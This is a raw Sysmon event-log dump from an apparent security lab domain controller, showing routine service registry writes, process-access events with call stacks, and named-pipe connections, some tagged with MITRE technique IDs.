13241300x80000000000000004446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\ErrorControlDWORD (0x00000000) 13241300x80000000000000004445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\StartDWORD (0x00000002) 13241300x80000000000000004444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_b6adb\TypeDWORD (0x000000e0) 13241300x80000000000000004443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\Description@%%SystemRoot%%\system32\cdpusersvc.dll,-101 13241300x80000000000000004442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\FailureActionsBinary Data 13241300x80000000000000004441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\Security\SecurityBinary Data 10341000x80000000000000004440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\DisplayNameCDPUserSvc_b6adb 13241300x80000000000000004437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000004436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\ErrorControlDWORD (0x00000001) 13241300x80000000000000004435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\StartDWORD (0x00000002) 13241300x80000000000000004434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.105{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_b6adb\TypeDWORD (0x000000e0) 10341000x80000000000000004433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.105{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.089{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.073{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.073{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000004428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:12.073{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.073{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.073{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.073{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000004424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:12.042{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.042{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.042{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000004421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.042{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000004420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 